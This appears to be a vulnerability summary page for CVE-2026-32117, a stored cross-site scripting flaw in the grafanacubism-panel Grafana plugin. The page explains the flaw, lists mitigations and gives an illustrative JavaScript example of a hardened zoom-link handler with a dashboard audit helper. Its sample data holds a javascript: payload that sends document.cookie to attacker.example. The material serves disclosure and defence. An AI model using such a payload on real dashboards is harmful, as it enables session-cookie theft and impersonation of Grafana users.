CVE-2026-32117
Published: 11 March 2026
Summary
CVE-2026-32117 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Ekacnet Grafanacubism-Panel. Its CVSS base score is 7.6 (High).
Exploitation maps to the MITRE ATT&CK technique Browser Session Hijacking (T1185). The CVE sits at the 2.6th percentile for exploit likelihood (well below the median), and it is not currently listed in the CISA KEV catalog.
Threat & Defense Details
Likely Mitigating Controls
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Penetration testing that submits XSS payloads to the web application can detect cross-site scripting flaws for subsequent remediation.
- Input validation rejects script-bearing content before it is stored. For this CVE that means validating the scheme of the editor-supplied zoom URL (allowing only http and https) rather than filtering for HTML tags, because the payload is a bare javascript: URI, not markup.
- Output validation against expected content can reject or sanitize script content in generated web pages, reducing XSS exploitability. Note that here the sink is a navigation API (window.location.assign() / window.open()) rather than HTML rendering, so HTML-encoding the value on output does not neutralize it; only a scheme check at the point of navigation does.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The stored XSS in the Grafana panel runs attacker-controlled script inside the Grafana origin, which directly enables browser session hijacking (T1185) through javascript: URI execution and theft or replay of web session cookies (T1539, T1550.004) for data exfiltration or impersonation. Reading the cookie through document.cookie only works if the session cookie is not marked HttpOnly; even when it is, script executing in the page can call Grafana's HTTP API with the victim's session attached and act as that user.
NVD Description
The grafanacubism-panel plugin allows use of cubism.js in Grafana. In 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() / window.open() with no scheme validation. An attacker with dashboard Editor privileges can set the link to a javascript: URI; when any Viewer drag-zooms on the panel, the payload executes in the Grafana origin.
Deeper analysis
CVE-2026-32117 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the grafanacubism-panel plugin, which lets Grafana panels render cubism.js charts. In versions 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() or window.open() without any scheme validation. Published on 2026-03-11, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N): network-reachable, low attack complexity, low privileges required (the Editor role), user interaction required (the Viewer's drag-zoom), and changed scope with high confidentiality impact, because the script runs in the Grafana origin rather than in the plugin alone.
An attacker needs dashboard Editor privileges to exploit the issue: they configure the panel's zoom link as a javascript: URI carrying a malicious payload. Exploitation occurs when any Viewer with access to the dashboard performs a drag-zoom on the affected panel, at which point the payload executes within the Grafana origin. The practical effect is a privilege boundary crossing from Editor to every user who views the dashboard, including administrators: the script can read anything visible to the victim (dashboard contents, data-source query results, API responses) and act with the victim's session, since requests it issues from the page carry that user's credentials.
Mitigation details are provided in the plugin's GitHub security advisory (GHSA-q6fh-6m3m-5948) and the fixing commit (b79cbf7e5eb3225bb204bcef274e15e6b19d9926). Security practitioners should update the grafanacubism-panel plugin to a release later than 0.1.2, audit existing dashboards (for example by exporting the dashboard JSON) for panel links whose scheme is anything other than http or https, and restrict the Editor role to trusted users, since any Editor can plant an exploitable panel that fires against every Viewer.
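As an added example (not code from grafanacubism-panel, Grafana, or the advisory), the JavaScript below contrasts the unchecked-navigation pattern the NVD text describes with a handler that allowlists http(s) schemes, and reuses the same parser-based check to audit a constructed dashboard JSON export for javascript: links. The function names, the `nav` stand-in for window.location, the `zoomLink` option key, and the panel `type` string are assumptions for illustration; the real plugin's option names and the exact change in the fixing commit are not on this page.

```javascript
// Added example, not code from grafanacubism-panel or Grafana. Names of
// functions, the `nav` object, the `zoomLink` option key and the panel `type`
// strings are assumptions made for illustration.

// Schemes a browser executes as script when navigated to.
const SCRIPT_SCHEMES = new Set(["javascript:", "data:", "vbscript:"]);

// Resolve `raw` against `base` with the WHATWG URL parser and return the
// scheme, or null if the string is not a URL at all. Using the parser rather
// than a string-prefix test matters: it lowercases the scheme and strips
// leading whitespace and embedded tab/newline characters, so
// "  JavaScript:alert(1)" and "java\tscript:alert(1)" both report
// "javascript:", where a naive startsWith("javascript:") would miss them.
function schemeOf(raw, base) {
  try {
    return new URL(raw, base).protocol;
  } catch {
    return null;
  }
}

// Allowlist: only http(s) links may be navigated. Relative links resolve
// against the dashboard origin and therefore pass. Whether to also pin the
// host (to stop open redirects) is a separate policy decision.
function isSafeHttpUrl(raw, base) {
  const scheme = schemeOf(raw, base);
  return scheme === "http:" || scheme === "https:";
}

// Vulnerable pattern (for contrast): whatever the editor configured is
// navigated to verbatim, so a "javascript:..." link runs in the page origin.
function openZoomLinkVulnerable(link, nav) {
  nav.assign(link);
  return true;
}

// Hardened pattern: refuse anything that is not http(s) and report it.
function openZoomLinkHardened(link, nav, base) {
  if (!isSafeHttpUrl(link, base)) return false;
  nav.assign(link);
  return true;
}

// Audit helper: walk every string under each panel's `options` and report
// those whose scheme is script-capable. A denylist is used here rather than
// the allowlist above because panel options hold many non-URL strings
// ("series:cpu" parses as a URL with scheme "series:") that would drown an
// allowlist-based report in noise.
function findScriptLinks(dashboard) {
  const findings = [];
  const walk = (value, path, panelId) => {
    if (typeof value === "string") {
      const scheme = schemeOf(value);
      if (scheme && SCRIPT_SCHEMES.has(scheme)) {
        findings.push({ panelId, path, scheme });
      }
    } else if (value && typeof value === "object") {
      for (const [k, v] of Object.entries(value)) {
        walk(v, `${path}.${k}`, panelId);
      }
    }
  };
  for (const panel of dashboard.panels || []) {
    walk(panel.options || {}, "options", panel.id);
  }
  return findings;
}

// Constructed sample dashboard export (not a real dashboard; plugin type
// strings are assumed).
const SAMPLE_DASHBOARD = {
  panels: [
    { id: 1, type: "grafanacubism-panel",
      options: { zoomLink: "/d/abc123/latency?from=$__from&to=$__to" } },
    { id: 2, type: "grafanacubism-panel",
      options: { zoomLink: "  JavaScript:fetch('https://attacker.example/?c='+document.cookie)" } },
    { id: 3, type: "timeseries", options: { legend: "series:cpu" } },
  ],
};

// Minimal window.location stand-in so the handlers run outside a browser.
function makeNav() {
  const calls = [];
  return { calls, assign: (u) => calls.push(u) };
}

// Stand-alone run: the vulnerable handler navigates to the payload, the
// hardened one refuses it, and the audit flags only panel 2.
const demoNav = makeNav();
openZoomLinkVulnerable(SAMPLE_DASHBOARD.panels[1].options.zoomLink, demoNav);
openZoomLinkHardened(SAMPLE_DASHBOARD.panels[1].options.zoomLink, demoNav, "https://grafana.example");
console.log("navigations performed:", demoNav.calls.length);
console.log("audit findings:", findScriptLinks(SAMPLE_DASHBOARD));
```

The audit walks only `options` because that is where panel-level configuration lives in a dashboard export; if the plugin stores the link elsewhere, widen the walk to the whole panel object. Run the same check against every dashboard after upgrading, since the upgrade fixes the handler but does not remove links an Editor has already planted.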
Details
- CWE(s)